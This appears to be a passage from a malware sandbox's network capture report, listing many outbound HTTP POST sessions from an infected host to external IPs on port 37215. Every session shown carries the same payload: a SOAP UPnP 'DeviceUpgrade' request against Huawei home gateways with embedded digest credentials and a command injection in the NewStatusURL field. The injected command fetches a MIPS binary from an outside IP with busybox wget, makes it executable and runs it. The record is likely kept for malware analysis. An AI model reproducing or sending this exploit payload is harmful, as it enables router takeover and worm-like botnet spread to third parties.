                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        883192.168.2.235977441.135.155.7837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489866972 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        884192.168.2.2351914157.11.185.11937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489869118 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        885192.168.2.235969241.158.84.13337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489873886 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        886192.168.2.2346960157.100.66.6437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489887953 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        887192.168.2.2341186197.46.114.4937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489887953 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        888192.168.2.234976041.252.213.13037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489897966 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        889192.168.2.235133841.0.212.7237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489917994 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        890192.168.2.235984041.174.224.21337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489917994 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        891192.168.2.233834072.72.126.9437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489929914 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        892192.168.2.2335704157.146.165.9337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489940882 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
